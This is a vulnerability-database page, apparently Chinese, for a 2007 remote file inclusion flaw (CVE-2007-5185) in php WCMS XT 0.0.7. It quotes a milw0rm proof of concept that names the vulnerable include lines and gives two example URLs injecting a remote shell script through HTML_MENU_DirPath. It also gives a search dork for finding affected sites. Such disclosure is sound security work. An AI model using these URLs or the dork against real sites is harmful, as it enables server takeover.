php wcms XT 0.0.7 - Multiple Remote File Inclusion Vulnerabilities

基本字段

漏洞编号：: SSV-64917

披露/发现时间：: 2007-10-03

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2007-5185

CNNVD-ID：: CNNVD-200710-045

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

暂无漏洞详情

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.3KB

?????__________________________________________????? ????????_____________________________________??????? ???????????_________________________________???????? ??????????????_____________________________????????? ????????????????__________________________?????????? ???????????????????______________________??????????? ?????????????????????___________________???????????? ??????????????????????_________________????????????? ????????????????????????_______________????????????? ??????????????????????????_____________????????????? ___?????????????????????????__________?????????????? _____?????????????????????????________?????????????? ________???????????????????????_______?????????????? ___________??????????????????????_____?????????????? ________________???????????????????___?????????????? _____________________???????????????__?????????????? _ __________________________????????????????????????_ _____________________???????????????????????????____ ______________???????????????????????????????_______ ___________???????????????????????????????????______ ________????????????????????????????????????????____ ______????????_____??????????????????????????????___ ____?????????_______??????????????????????????????__ __???????????_______???????????????????????????????_ _?????????????_____????????????????????????????????? ???????????????????????????????????????????????????? ???????????????????????????????????????????????????? ???????????????????????????????????????????????????? ???????????????????????????????????????????????????? _??????????????????????????????????????????????????_ __?????????????????????????????????????????????????_ _____?????????????????????????????????????????????__ _____ ____????????????????????????????????????????___ _______________??????????????????????????????????___ _________________???????????????????????????????____ _________________???????????????????????????________ ________________??????????_____??????????___________ _________________?????_________?????_________?????__ __________????_________????____________?????????____ __________?????????????????_____??????????__________ __________?????????????????___?????_________________ __________?????______??????_________________________ # php WCMS XT 0_0_7 BETA <= Remote File Inclusion Vulnerability # #Dork:http://www.google.com.tr/search?hl=tr&q=Copyright+%C2%A9+2007+by+Horst-D.+Kr%C3%B6ller+%C2%B7+CMS%3A+php+WCMS+&meta= # #Vuln Code ############################################################################################## # #ERROR1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php # // Neccessary Classes require_once $HTML_MENU_DirPath.'HTML/Menu.php'; require_once $HTML_MENU_DirPath.'HTML/Menu/DirectRenderer.php'; require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI # # #BUG1:phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath # #Example1:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=[[Sh3LLScript]] # ############################################################################################## #Vuln Code ############################################################################################## # #ERROR2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php # require_once $HTML_MENU_DirPath.'HTML/Menu.php'; require_once $HTML_MENU_DirPath.'HTML/Menu/DirectTreeRenderer.php'; <<< RFI # # #BUG2:phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath # #Example2:http://site.com/path/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=[[Sh3LLScript]] # ############################################################################################## #download: # #http://sourceforge.net/project/showfiles.php?group_id=160753&package_id=191865&release_id=419910 # ############################################################################################## # #>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> coded by K3ZZAP66345<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< # #"HAYIRLI RAMAZANLAR... ;)" # # #####specialthanx:###..Str0ke..####..KEZZAP66345..####..Wocker..############################## ############################################################################################## # milw0rm.com [2007-10-01]

共 3 兑换

参考链接

http://www.exploit-db.com/exploits/4477

解决方案

临时解决方案

官方解决方案

防护方案

匿名兑换PoC
匿名兑换PoC
匿名兑换PoC

生命线

2007-10-03 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

php wcms XT 0.0.7 - Multiple Remote File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

php wcms XT 0.0.7 - Multiple Remote File Inclusion Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定